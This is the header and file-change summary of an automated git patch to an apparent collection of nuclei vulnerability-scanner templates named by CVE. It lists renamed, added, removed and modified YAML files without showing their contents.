From 65ead6603aa76aeace95d7b70883627076be2ee2 Mon Sep 17 00:00:00 2001 From: test Date: Sat, 14 Sep 2024 02:20:31 +0000 Subject: [PATCH] Auto Updated --- README.md | 388 +- data.json | 3 +- data1.json | 352 +- links.csv | 1 + ...{cve-2000-0114.yaml => CVE-2000-0114.yaml} | 0 nuclei-templates/CVE-2001/CVE-2001-0537.yaml | 14 +- ...{CVE-2001-1473.yaml => cve-2001-1473.yaml} | 0 nuclei-templates/CVE-2003/CVE-2003-1598.yaml | 20 +- nuclei-templates/CVE-2003/CVE-2003-1599.yaml | 13 +- nuclei-templates/CVE-2004/CVE-2004-1559.yaml | 20 +- nuclei-templates/CVE-2004/CVE-2004-1584.yaml | 19 +- nuclei-templates/CVE-2004/CVE-2004-1965.yaml | 7 +- nuclei-templates/CVE-2005/CVE-2005-1102.yaml | 12 +- nuclei-templates/CVE-2005/CVE-2005-1687.yaml | 17 +- nuclei-templates/CVE-2005/CVE-2005-1688.yaml | 15 +- nuclei-templates/CVE-2005/CVE-2005-1810.yaml | 15 +- nuclei-templates/CVE-2005/CVE-2005-2107.yaml | 11 +- nuclei-templates/CVE-2005/CVE-2005-2108.yaml | 17 +- nuclei-templates/CVE-2005/CVE-2005-2109.yaml | 11 +- nuclei-templates/CVE-2005/CVE-2005-2110.yaml | 13 +- nuclei-templates/CVE-2005/CVE-2005-2428.yaml | 33 + nuclei-templates/CVE-2005/CVE-2005-2612.yaml | 10 +- nuclei-templates/CVE-2005/CVE-2005-3634.yaml | 11 +- nuclei-templates/CVE-2005/CVE-2005-4463.yaml | 15 +- nuclei-templates/CVE-2005/cve-2005-2428.yaml | 25 - nuclei-templates/CVE-2005/cve-2005-3344.yaml | 28 +- ...{CVE-2005-4385.yaml => cve-2005-4385.yaml} | 0 nuclei-templates/CVE-2006/CVE-2006-0985.yaml | 15 +- nuclei-templates/CVE-2006/CVE-2006-0986.yaml | 14 +- nuclei-templates/CVE-2006/CVE-2006-1012.yaml | 13 +- nuclei-templates/CVE-2006/CVE-2006-1263.yaml | 15 +- ...{cve-2006-1681.yaml => CVE-2006-1681.yaml} | 0 nuclei-templates/CVE-2006/CVE-2006-1796.yaml | 10 +- nuclei-templates/CVE-2006/CVE-2006-2667.yaml | 17 +- nuclei-templates/CVE-2006/CVE-2006-2702.yaml | 16 +- nuclei-templates/CVE-2006/CVE-2006-3390.yaml | 16 +- nuclei-templates/CVE-2006/CVE-2006-4028.yaml | 16 +- nuclei-templates/CVE-2006/CVE-2006-4208.yaml | 15 +- nuclei-templates/CVE-2006/CVE-2006-4743.yaml | 12 +- nuclei-templates/CVE-2006/CVE-2006-5705.yaml | 18 +- nuclei-templates/CVE-2006/CVE-2006-6016.yaml | 12 +- nuclei-templates/CVE-2006/CVE-2006-6017.yaml | 11 +- nuclei-templates/CVE-2006/CVE-2006-6808.yaml | 17 +- nuclei-templates/CVE-2007/CVE-2007-0106.yaml | 16 +- nuclei-templates/CVE-2007/CVE-2007-0107.yaml | 20 +- nuclei-templates/CVE-2007/CVE-2007-0109.yaml | 16 +- nuclei-templates/CVE-2007/CVE-2007-0233.yaml | 12 +- nuclei-templates/CVE-2007/CVE-2007-0262.yaml | 10 +- nuclei-templates/CVE-2007/CVE-2007-0539.yaml | 17 +- nuclei-templates/CVE-2007/CVE-2007-0541.yaml | 17 +- nuclei-templates/CVE-2007/CVE-2007-0885.yaml | 34 - nuclei-templates/CVE-2007/CVE-2007-1049.yaml | 24 +- nuclei-templates/CVE-2007/CVE-2007-1230.yaml | 14 +- nuclei-templates/CVE-2007/CVE-2007-1244.yaml | 16 +- nuclei-templates/CVE-2007/CVE-2007-1277.yaml | 23 +- nuclei-templates/CVE-2007/CVE-2007-1599.yaml | 18 +- nuclei-templates/CVE-2007/CVE-2007-1622.yaml | 21 +- nuclei-templates/CVE-2007/CVE-2007-1893.yaml | 15 +- nuclei-templates/CVE-2007/CVE-2007-1894.yaml | 23 +- nuclei-templates/CVE-2007/CVE-2007-1897.yaml | 22 +- nuclei-templates/CVE-2007/CVE-2007-4556.yaml | 34 - nuclei-templates/CVE-2007/CVE-2007-5728.yaml | 38 - nuclei-templates/CVE-2007/cve-2007-0885.yaml | 29 + nuclei-templates/CVE-2007/cve-2007-4556.yaml | 30 + nuclei-templates/CVE-2007/cve-2007-5728.yaml | 32 + nuclei-templates/CVE-2008/CVE-2008-1059.yaml | 27 +- nuclei-templates/CVE-2008/CVE-2008-1061.yaml | 39 +- nuclei-templates/CVE-2008/CVE-2008-1547.yaml | 14 +- ...{cve-2008-2398.yaml => CVE-2008-2398.yaml} | 0 ...{cve-2008-2650.yaml => CVE-2008-2650.yaml} | 0 nuclei-templates/CVE-2008/CVE-2008-4668.yaml | 11 +- nuclei-templates/CVE-2008/CVE-2008-5587.yaml | 19 +- nuclei-templates/CVE-2008/CVE-2008-6465.yaml | 22 +- nuclei-templates/CVE-2008/CVE-2008-6982.yaml | 24 +- nuclei-templates/CVE-2008/CVE-2008-7269.yaml | 14 +- ...{CVE-2008-6172.yaml => cve-2008-6172.yaml} | 0 ...{CVE-2008-6222.yaml => cve-2008-6222.yaml} | 0 nuclei-templates/CVE-2009/CVE-2009-0347.yaml | 5 +- ...{cve-2009-1496.yaml => CVE-2009-1496.yaml} | 0 nuclei-templates/CVE-2009/CVE-2009-1872.yaml | 9 +- ...{cve-2009-2100.yaml => CVE-2009-2100.yaml} | 0 ...{cve-2009-3318.yaml => CVE-2009-3318.yaml} | 0 nuclei-templates/CVE-2009/CVE-2009-4202.yaml | 19 +- ...{CVE-2009-2015.yaml => cve-2009-2015.yaml} | 0 ...{CVE-2009-4679.yaml => cve-2009-4679.yaml} | 0 ...{CVE-2009-5020.yaml => cve-2009-5020.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-0759.yaml | 28 - nuclei-templates/CVE-2010/CVE-2010-1081.yaml | 26 - nuclei-templates/CVE-2010/CVE-2010-1302.yaml | 26 - nuclei-templates/CVE-2010/CVE-2010-1304.yaml | 15 +- ...{cve-2010-1305.yaml => CVE-2010-1305.yaml} | 0 ...{cve-2010-1306.yaml => CVE-2010-1306.yaml} | 0 ...{cve-2010-1313.yaml => CVE-2010-1313.yaml} | 0 ...{cve-2010-1314.yaml => CVE-2010-1314.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1429.yaml | 27 +- nuclei-templates/CVE-2010/CVE-2010-1461.yaml | 17 +- nuclei-templates/CVE-2010/CVE-2010-1470.yaml | 13 +- ...{cve-2010-1475.yaml => CVE-2010-1475.yaml} | 0 ...{cve-2010-1495.yaml => CVE-2010-1495.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1532.yaml | 28 - ...{cve-2010-1535.yaml => CVE-2010-1535.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1540.yaml | 13 +- nuclei-templates/CVE-2010/CVE-2010-1586.yaml | 6 +- ...{cve-2010-1602.yaml => CVE-2010-1602.yaml} | 0 ...{cve-2010-1603.yaml => CVE-2010-1603.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1653.yaml | 13 +- ...{cve-2010-1715.yaml => CVE-2010-1715.yaml} | 0 ...{cve-2010-1722.yaml => CVE-2010-1722.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1723.yaml | 28 - ...{cve-2010-1870.yaml => CVE-2010-1870.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-1952.yaml | 13 +- ...{cve-2010-1954.yaml => CVE-2010-1954.yaml} | 0 ...{cve-2010-1956.yaml => CVE-2010-1956.yaml} | 0 ...{cve-2010-1981.yaml => CVE-2010-1981.yaml} | 0 ...{cve-2010-1982.yaml => CVE-2010-1982.yaml} | 0 ...{cve-2010-2033.yaml => CVE-2010-2033.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2034.yaml | 9 +- ...{cve-2010-2035.yaml => CVE-2010-2035.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2037.yaml | 16 +- nuclei-templates/CVE-2010/CVE-2010-2045.yaml | 17 +- nuclei-templates/CVE-2010/CVE-2010-2259.yaml | 29 - ...{cve-2010-2307.yaml => CVE-2010-2307.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2507.yaml | 20 +- ...{cve-2010-2680.yaml => CVE-2010-2680.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-2857.yaml | 32 - nuclei-templates/CVE-2010/CVE-2010-2918.yaml | 29 - ...{cve-2010-2920.yaml => CVE-2010-2920.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-3426.yaml | 9 +- ...{cve-2010-4617.yaml => CVE-2010-4617.yaml} | 0 nuclei-templates/CVE-2010/CVE-2010-4719.yaml | 11 +- nuclei-templates/CVE-2010/CVE-2010-4977.yaml | 29 - ...{cve-2010-5278.yaml => CVE-2010-5278.yaml} | 0 ...{CVE-2010-0157.yaml => cve-2010-0157.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-0219.yaml | 29 +- nuclei-templates/CVE-2010/cve-2010-0759.yaml | 27 + ...{CVE-2010-0942.yaml => cve-2010-0942.yaml} | 0 ...{CVE-2010-0944.yaml => cve-2010-0944.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1081.yaml | 27 + ...{CVE-2010-1217.yaml => cve-2010-1217.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1302.yaml | 27 + ...{CVE-2010-1352.yaml => cve-2010-1352.yaml} | 0 ...{CVE-2010-1353.yaml => cve-2010-1353.yaml} | 0 ...{CVE-2010-1354.yaml => cve-2010-1354.yaml} | 0 ...{CVE-2010-1472.yaml => cve-2010-1472.yaml} | 0 ...{CVE-2010-1473.yaml => cve-2010-1473.yaml} | 0 ...{CVE-2010-1491.yaml => cve-2010-1491.yaml} | 0 ...{CVE-2010-1531.yaml => cve-2010-1531.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1532.yaml | 27 + ...{CVE-2010-1601.yaml => cve-2010-1601.yaml} | 0 ...{CVE-2010-1657.yaml => cve-2010-1657.yaml} | 0 ...{CVE-2010-1718.yaml => cve-2010-1718.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-1723.yaml | 27 + ...{CVE-2010-1979.yaml => cve-2010-1979.yaml} | 0 ...{CVE-2010-2036.yaml => cve-2010-2036.yaml} | 0 ...{CVE-2010-2050.yaml => cve-2010-2050.yaml} | 0 ...{CVE-2010-2128.yaml => cve-2010-2128.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-2259.yaml | 27 + nuclei-templates/CVE-2010/cve-2010-2857.yaml | 27 + nuclei-templates/CVE-2010/cve-2010-2918.yaml | 27 + ...{CVE-2010-3203.yaml => cve-2010-3203.yaml} | 0 ...{CVE-2010-4239.yaml => cve-2010-4239.yaml} | 0 nuclei-templates/CVE-2010/cve-2010-4977.yaml | 27 + nuclei-templates/CVE-2011/CVE-2011-0049.yaml | 30 - ...{cve-2011-1669.yaml => CVE-2011-1669.yaml} | 0 nuclei-templates/CVE-2011/CVE-2011-2523.yaml | 5 +- nuclei-templates/CVE-2011/CVE-2011-4336.yaml | 41 - nuclei-templates/CVE-2011/CVE-2011-4624.yaml | 10 +- nuclei-templates/CVE-2011/CVE-2011-4926.yaml | 33 - ...{cve-2011-5107.yaml => CVE-2011-5107.yaml} | 0 ...{cve-2011-5179.yaml => CVE-2011-5179.yaml} | 0 nuclei-templates/CVE-2011/CVE-2011-5181.yaml | 34 - nuclei-templates/CVE-2011/CVE-2011-5252.yaml | 14 +- ...{cve-2011-5265.yaml => CVE-2011-5265.yaml} | 0 nuclei-templates/CVE-2011/cve-2011-0049.yaml | 29 + nuclei-templates/CVE-2011/cve-2011-4336.yaml | 38 + nuclei-templates/CVE-2011/cve-2011-4926.yaml | 30 + nuclei-templates/CVE-2011/cve-2011-5181.yaml | 30 + nuclei-templates/CVE-2012/CVE-2012-0392.yaml | 10 +- nuclei-templates/CVE-2012/CVE-2012-0394.yaml | 28 +- nuclei-templates/CVE-2012/CVE-2012-0896.yaml | 15 +- nuclei-templates/CVE-2012/CVE-2012-0991.yaml | 28 - nuclei-templates/CVE-2012/CVE-2012-0996.yaml | 15 +- nuclei-templates/CVE-2012/CVE-2012-2122.yaml | 61 + nuclei-templates/CVE-2012/CVE-2012-4032.yaml | 31 +- nuclei-templates/CVE-2012/CVE-2012-4253.yaml | 13 +- nuclei-templates/CVE-2012/CVE-2012-4547.yaml | 10 +- nuclei-templates/CVE-2012/CVE-2012-4768.yaml | 33 - nuclei-templates/CVE-2012/CVE-2012-4940.yaml | 31 - nuclei-templates/CVE-2012/CVE-2012-4982.yaml | 9 +- nuclei-templates/CVE-2012/CVE-2012-5321.yaml | 20 +- nuclei-templates/CVE-2012/CVE-2012-6499.yaml | 26 +- ...{CVE-2012-0901.yaml => cve-2012-0901.yaml} | 0 ...{CVE-2012-0981.yaml => cve-2012-0981.yaml} | 0 nuclei-templates/CVE-2012/cve-2012-0991.yaml | 27 + ...{CVE-2012-3153.yaml => cve-2012-3153.yaml} | 0 nuclei-templates/CVE-2012/cve-2012-4768.yaml | 30 + nuclei-templates/CVE-2012/cve-2012-4940.yaml | 25 + ...{CVE-2012-5913.yaml => cve-2012-5913.yaml} | 0 nuclei-templates/CVE-2013/CVE-2013-1965.yaml | 32 - nuclei-templates/CVE-2013/CVE-2013-2248.yaml | 21 - ...{cve-2013-2251.yaml => CVE-2013-2251.yaml} | 0 nuclei-templates/CVE-2013/CVE-2013-2287.yaml | 32 - nuclei-templates/CVE-2013/CVE-2013-2621.yaml | 15 +- ...{cve-2013-3827.yaml => CVE-2013-3827.yaml} | 0 nuclei-templates/CVE-2013/CVE-2013-4117.yaml | 32 - nuclei-templates/CVE-2013/CVE-2013-6281.yaml | 41 + nuclei-templates/CVE-2013/CVE-2013-7285.yaml | 10 +- nuclei-templates/CVE-2013/cve-2013-1965.yaml | 29 + nuclei-templates/CVE-2013/cve-2013-2248.yaml | 20 + nuclei-templates/CVE-2013/cve-2013-2287.yaml | 30 + nuclei-templates/CVE-2013/cve-2013-4117.yaml | 30 + ...{CVE-2013-5528.yaml => cve-2013-5528.yaml} | 0 nuclei-templates/CVE-2013/cve-2013-6281.yaml | 49 - nuclei-templates/CVE-2014/CVE-2014-10037.yaml | 17 +- nuclei-templates/CVE-2014/CVE-2014-1203.yaml | 39 - ...{cve-2014-2323.yaml => CVE-2014-2323.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-4536.yaml | 36 - ...{cve-2014-4550.yaml => CVE-2014-4550.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-4558.yaml | 20 +- ...{cve-2014-4561.yaml => CVE-2014-4561.yaml} | 0 ...{cve-2014-4592.yaml => CVE-2014-4592.yaml} | 0 ...{cve-2014-4940.yaml => CVE-2014-4940.yaml} | 0 ...{cve-2014-5368.yaml => CVE-2014-5368.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-6271.yaml | 44 - nuclei-templates/CVE-2014/CVE-2014-6287.yaml | 8 +- nuclei-templates/CVE-2014/CVE-2014-8676.yaml | 19 +- nuclei-templates/CVE-2014/CVE-2014-8799.yaml | 12 +- nuclei-templates/CVE-2014/CVE-2014-9094.yaml | 24 - nuclei-templates/CVE-2014/CVE-2014-9119.yaml | 26 +- nuclei-templates/CVE-2014/CVE-2014-9180.yaml | 13 +- ...{cve-2014-9444.yaml => CVE-2014-9444.yaml} | 0 ...{cve-2014-9606.yaml => CVE-2014-9606.yaml} | 0 ...{cve-2014-9607.yaml => CVE-2014-9607.yaml} | 0 ...{cve-2014-9608.yaml => CVE-2014-9608.yaml} | 0 nuclei-templates/CVE-2014/CVE-2014-9614.yaml | 12 +- ...{cve-2014-9617.yaml => CVE-2014-9617.yaml} | 0 ...{cve-2014-9618.yaml => CVE-2014-9618.yaml} | 0 nuclei-templates/CVE-2014/cve-2014-1203.yaml | 51 + ...{CVE-2014-2383.yaml => cve-2014-2383.yaml} | 0 ...{CVE-2014-2908.yaml => cve-2014-2908.yaml} | 0 nuclei-templates/CVE-2014/cve-2014-3120.yaml | 16 +- ...{CVE-2014-3704.yaml => cve-2014-3704.yaml} | 0 ...{CVE-2014-4513.yaml => cve-2014-4513.yaml} | 0 ...{CVE-2014-4535.yaml => cve-2014-4535.yaml} | 0 nuclei-templates/CVE-2014/cve-2014-4536.yaml | 37 + nuclei-templates/CVE-2014/cve-2014-4942.yaml | 25 +- nuclei-templates/CVE-2014/cve-2014-6271.yaml | 44 + ...{CVE-2014-8682.yaml => cve-2014-8682.yaml} | 0 nuclei-templates/CVE-2014/cve-2014-9094.yaml | 29 + ...{CVE-2014-9615.yaml => cve-2014-9615.yaml} | 0 .../CVE-2015/CVE-2015-1000005.yaml | 21 +- .../CVE-2015/CVE-2015-1000010.yaml | 21 +- nuclei-templates/CVE-2015/CVE-2015-1579.yaml | 26 +- ...{cve-2015-1880.yaml => CVE-2015-1880.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-20067.yaml | 17 +- nuclei-templates/CVE-2015/CVE-2015-2068.yaml | 8 +- nuclei-templates/CVE-2015/CVE-2015-2196.yaml | 10 +- nuclei-templates/CVE-2015/CVE-2015-2755.yaml | 10 +- nuclei-templates/CVE-2015/CVE-2015-2794.yaml | 48 + nuclei-templates/CVE-2015/CVE-2015-2863.yaml | 8 +- nuclei-templates/CVE-2015/CVE-2015-2996.yaml | 27 +- nuclei-templates/CVE-2015/CVE-2015-3035.yaml | 24 +- nuclei-templates/CVE-2015/CVE-2015-3224.yaml | 43 - nuclei-templates/CVE-2015/CVE-2015-4062.yaml | 10 +- nuclei-templates/CVE-2015/CVE-2015-4063.yaml | 8 +- nuclei-templates/CVE-2015/CVE-2015-4074.yaml | 23 +- nuclei-templates/CVE-2015/CVE-2015-4127.yaml | 35 +- ...{cve-2015-4414.yaml => CVE-2015-4414.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-4666.yaml | 29 + nuclei-templates/CVE-2015/CVE-2015-4668.yaml | 30 - nuclei-templates/CVE-2015/CVE-2015-4694.yaml | 21 +- nuclei-templates/CVE-2015/CVE-2015-5354.yaml | 31 - nuclei-templates/CVE-2015/CVE-2015-5469.yaml | 21 +- nuclei-templates/CVE-2015/CVE-2015-5531.yaml | 9 +- ...{cve-2015-5688.yaml => CVE-2015-5688.yaml} | 0 ...{cve-2015-6477.yaml => CVE-2015-6477.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-6544.yaml | 35 - nuclei-templates/CVE-2015/CVE-2015-7245.yaml | 20 +- ...{cve-2015-7377.yaml => CVE-2015-7377.yaml} | 0 ...{cve-2015-7823.yaml => CVE-2015-7823.yaml} | 0 nuclei-templates/CVE-2015/CVE-2015-9312.yaml | 9 +- nuclei-templates/CVE-2015/CVE-2015-9323.yaml | 16 +- nuclei-templates/CVE-2015/CVE-2015-9414.yaml | 13 +- ...{cve-2015-9480.yaml => CVE-2015-9480.yaml} | 0 ...{CVE-2015-2166.yaml => cve-2015-2166.yaml} | 0 ...{CVE-2015-2807.yaml => cve-2015-2807.yaml} | 0 nuclei-templates/CVE-2015/cve-2015-3224.yaml | 57 + ...{CVE-2015-3306.yaml => cve-2015-3306.yaml} | 0 nuclei-templates/CVE-2015/cve-2015-4666.yaml | 35 - nuclei-templates/CVE-2015/cve-2015-4668.yaml | 43 + nuclei-templates/CVE-2015/cve-2015-5354.yaml | 42 + nuclei-templates/CVE-2015/cve-2015-6544.yaml | 36 + ...{CVE-2015-7450.yaml => cve-2015-7450.yaml} | 0 nuclei-templates/CVE-2015/cve-2015-8399.yaml | 9 +- ...016-1000126.yaml => CVE-2016-1000126.yaml} | 0 ...016-1000127.yaml => CVE-2016-1000127.yaml} | 0 ...016-1000128.yaml => CVE-2016-1000128.yaml} | 0 .../CVE-2016/CVE-2016-1000133.yaml | 34 - .../CVE-2016/CVE-2016-1000134.yaml | 34 - ...016-1000135.yaml => CVE-2016-1000135.yaml} | 0 ...016-1000138.yaml => CVE-2016-1000138.yaml} | 0 .../CVE-2016/CVE-2016-1000141.yaml | 40 - .../CVE-2016/CVE-2016-1000142.yaml | 34 - ...016-1000148.yaml => CVE-2016-1000148.yaml} | 0 ...016-1000149.yaml => CVE-2016-1000149.yaml} | 0 ...ve-2016-10033.yaml => CVE-2016-10033.yaml} | 0 nuclei-templates/CVE-2016/CVE-2016-10108.yaml | 10 +- nuclei-templates/CVE-2016/CVE-2016-10368.yaml | 22 +- nuclei-templates/CVE-2016/CVE-2016-10960.yaml | 39 - nuclei-templates/CVE-2016/CVE-2016-10973.yaml | 26 +- nuclei-templates/CVE-2016/CVE-2016-1555.yaml | 31 - ...{cve-2016-2004.yaml => CVE-2016-2004.yaml} | 0 ...{cve-2016-3088.yaml => CVE-2016-3088.yaml} | 0 nuclei-templates/CVE-2016/CVE-2016-3510.yaml | 39 +- nuclei-templates/CVE-2016/CVE-2016-4437.yaml | 10 +- ...{cve-2016-4975.yaml => CVE-2016-4975.yaml} | 0 nuclei-templates/CVE-2016/CVE-2016-6195.yaml | 33 +- nuclei-templates/CVE-2016/CVE-2016-6210.yaml | 8 +- nuclei-templates/CVE-2016/CVE-2016-6277.yaml | 29 - nuclei-templates/CVE-2016/CVE-2016-6601.yaml | 20 +- nuclei-templates/CVE-2016/CVE-2016-7834.yaml | 21 +- nuclei-templates/CVE-2016/CVE-2016-8706.yaml | 6 +- ...{CVE-2016-0957.yaml => cve-2016-0957.yaml} | 0 ...016-1000129.yaml => cve-2016-1000129.yaml} | 0 ...016-1000132.yaml => cve-2016-1000132.yaml} | 0 .../CVE-2016/cve-2016-1000133.yaml | 35 + .../CVE-2016/cve-2016-1000134.yaml | 35 + ...016-1000139.yaml => cve-2016-1000139.yaml} | 0 .../CVE-2016/cve-2016-1000141.yaml | 35 + .../CVE-2016/cve-2016-1000142.yaml | 37 + ...016-1000153.yaml => cve-2016-1000153.yaml} | 0 nuclei-templates/CVE-2016/cve-2016-10367.yaml | 22 +- ...VE-2016-10924.yaml => cve-2016-10924.yaml} | 0 nuclei-templates/CVE-2016/cve-2016-10940.yaml | 24 +- nuclei-templates/CVE-2016/cve-2016-10960.yaml | 34 + nuclei-templates/CVE-2016/cve-2016-1555.yaml | 47 + ...{CVE-2016-2389.yaml => cve-2016-2389.yaml} | 0 ...{CVE-2016-3081.yaml => cve-2016-3081.yaml} | 0 nuclei-templates/CVE-2016/cve-2016-3978.yaml | 30 +- ...{CVE-2016-4977.yaml => cve-2016-4977.yaml} | 0 ...{CVE-2016-5649.yaml => cve-2016-5649.yaml} | 0 nuclei-templates/CVE-2016/cve-2016-6277.yaml | 32 + ...{CVE-2016-8527.yaml => cve-2016-8527.yaml} | 0 .../CVE-2017/CVE-2017-1000029.yaml | 29 +- .../CVE-2017/CVE-2017-1000163.yaml | 27 +- .../CVE-2017/CVE-2017-1000486.yaml | 13 +- nuclei-templates/CVE-2017/CVE-2017-10075.yaml | 15 +- nuclei-templates/CVE-2017/CVE-2017-11165.yaml | 19 +- nuclei-templates/CVE-2017/CVE-2017-11512.yaml | 50 + ...ve-2017-11610.yaml => CVE-2017-11610.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-11629.yaml | 18 +- nuclei-templates/CVE-2017/CVE-2017-12138.yaml | 45 +- nuclei-templates/CVE-2017/CVE-2017-12149.yaml | 0 nuclei-templates/CVE-2017/CVE-2017-12583.yaml | 28 +- ...ve-2017-12611.yaml => CVE-2017-12611.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-12617.yaml | 13 +- ...ve-2017-12794.yaml => CVE-2017-12794.yaml} | 0 ...ve-2017-14135.yaml => CVE-2017-14135.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-14186.yaml | 21 +- nuclei-templates/CVE-2017/CVE-2017-14524.yaml | 39 +- nuclei-templates/CVE-2017/CVE-2017-14622.yaml | 9 +- nuclei-templates/CVE-2017/CVE-2017-15287.yaml | 3 + nuclei-templates/CVE-2017/CVE-2017-15363.yaml | 15 +- ...ve-2017-15647.yaml => CVE-2017-15647.yaml} | 0 ...ve-2017-15944.yaml => CVE-2017-15944.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-16894.yaml | 59 + nuclei-templates/CVE-2017/CVE-2017-17731.yaml | 11 +- nuclei-templates/CVE-2017/CVE-2017-17736.yaml | 54 + ...ve-2017-18024.yaml => CVE-2017-18024.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-18487.yaml | 47 +- nuclei-templates/CVE-2017/CVE-2017-18490.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18491.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18492.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18493.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18494.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18496.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18500.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18501.yaml | 8 +- nuclei-templates/CVE-2017/CVE-2017-18502.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18505.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18516.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18517.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18518.yaml | 8 +- nuclei-templates/CVE-2017/CVE-2017-18527.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18528.yaml | 8 +- nuclei-templates/CVE-2017/CVE-2017-18529.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18530.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18532.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18537.yaml | 8 +- nuclei-templates/CVE-2017/CVE-2017-18542.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18556.yaml | 48 +- nuclei-templates/CVE-2017/CVE-2017-18557.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18558.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18562.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18564.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18565.yaml | 6 +- nuclei-templates/CVE-2017/CVE-2017-18566.yaml | 6 +- ...ve-2017-18638.yaml => CVE-2017-18638.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-5645.yaml | 28 +- nuclei-templates/CVE-2017/CVE-2017-5689.yaml | 25 +- nuclei-templates/CVE-2017/CVE-2017-6361.yaml | 22 - nuclei-templates/CVE-2017/CVE-2017-7391.yaml | 7 +- nuclei-templates/CVE-2017/CVE-2017-7504.yaml | 48 - nuclei-templates/CVE-2017/CVE-2017-7855.yaml | 4 +- nuclei-templates/CVE-2017/CVE-2017-7925.yaml | 10 +- nuclei-templates/CVE-2017/CVE-2017-8229.yaml | 58 + nuclei-templates/CVE-2017/CVE-2017-9416.yaml | 8 +- ...{cve-2017-9506.yaml => CVE-2017-9506.yaml} | 0 nuclei-templates/CVE-2017/CVE-2017-9822.yaml | 20 +- ...017-1000027.yaml => cve-2017-1000027.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-11512.yaml | 40 - ...VE-2017-11586.yaml => cve-2017-11586.yaml} | 0 ...VE-2017-12544.yaml => cve-2017-12544.yaml} | 0 ...VE-2017-12635.yaml => cve-2017-12635.yaml} | 0 ...VE-2017-14849.yaml => cve-2017-14849.yaml} | 0 ...VE-2017-18536.yaml => cve-2017-18536.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-18598.yaml | 88 +- ...{CVE-2017-3528.yaml => cve-2017-3528.yaml} | 0 ...{CVE-2017-5521.yaml => cve-2017-5521.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-5631.yaml | 25 +- ...{CVE-2017-5982.yaml => cve-2017-5982.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-6361.yaml | 23 + nuclei-templates/CVE-2017/cve-2017-7529.yaml | 36 +- nuclei-templates/CVE-2017/cve-2017-8917.yaml | 11 +- ...{CVE-2017-9288.yaml => cve-2017-9288.yaml} | 0 nuclei-templates/CVE-2017/cve-2017-9833.yaml | 27 +- nuclei-templates/CVE-2018/CVE-2018-0101.yaml | 7 +- ...{cve-2018-0296.yaml => CVE-2018-0296.yaml} | 0 ...018-1000129.yaml => CVE-2018-1000129.yaml} | 0 .../CVE-2018/CVE-2018-1000671.yaml | 44 + ...018-1000861.yaml => CVE-2018-1000861.yaml} | 0 ...ve-2018-10093.yaml => CVE-2018-10093.yaml} | 0 ...ve-2018-10095.yaml => CVE-2018-10095.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-10822.yaml | 14 +- nuclei-templates/CVE-2018/CVE-2018-11227.yaml | 23 +- nuclei-templates/CVE-2018/CVE-2018-11231.yaml | 15 +- ...ve-2018-11409.yaml => CVE-2018-11409.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-11473.yaml | 26 +- nuclei-templates/CVE-2018/CVE-2018-11709.yaml | 39 - ...ve-2018-11776.yaml => CVE-2018-11776.yaml} | 0 ...ve-2018-12054.yaml => CVE-2018-12054.yaml} | 0 ...{cve-2018-1207.yaml => CVE-2018-1207.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-12300.yaml | 39 + ...ve-2018-12634.yaml => CVE-2018-12634.yaml} | 0 nuclei-templates/CVE-2018/CVE-2018-12675.yaml | 44 + nuclei-templates/CVE-2018/CVE-2018-12909.yaml | 50 + nuclei-templates/CVE-2018/CVE-2018-13980.yaml | 36 - nuclei-templates/CVE-2018/CVE-2018-14013.yaml | 15 +- nuclei-templates/CVE-2018/CVE-2018-14064.yaml | 30 - nuclei-templates/CVE-2018/CVE-2018-14502.yaml | 39 +- 